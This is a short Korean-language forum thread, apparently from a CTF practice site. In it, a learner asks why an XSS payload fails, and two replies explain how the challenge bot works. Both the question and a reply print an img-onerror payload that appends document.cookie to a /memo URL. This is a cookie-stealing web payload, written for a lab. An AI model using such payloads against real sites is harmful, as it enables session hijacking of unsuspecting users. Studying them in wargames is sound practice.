페이로드
<img src="aa.jpg" onerror="location.href='/memo?memo='+ document.cookie"/>
해당 페이로드를 /flag의 param이 아닌
/vuln?param= 에 넣어주면 왜 오류만 뜨고 onerror는 작동을 안하나요..?
#web
작성자 정보
답변
2
sys_neko
워게임: 50
이해는 하신 것 같다만 코드 상의 오류가 다소 있습니다.
<img src="x" onerror="location.href='/memo?memo='+document.cookie">
geeneoning
Dreamhack CTF S2 Ⅳ 참여
onerror는 동작하시겠지만 쿠키가 없는 상태여서 아무것도 안들어가는게 맞으실 겁니다!
쿠키는 /flag에 스크립트를 넣어서 봇이 스크립트를 실행시켜야 가지고있는 쿠키가 날라갈거에요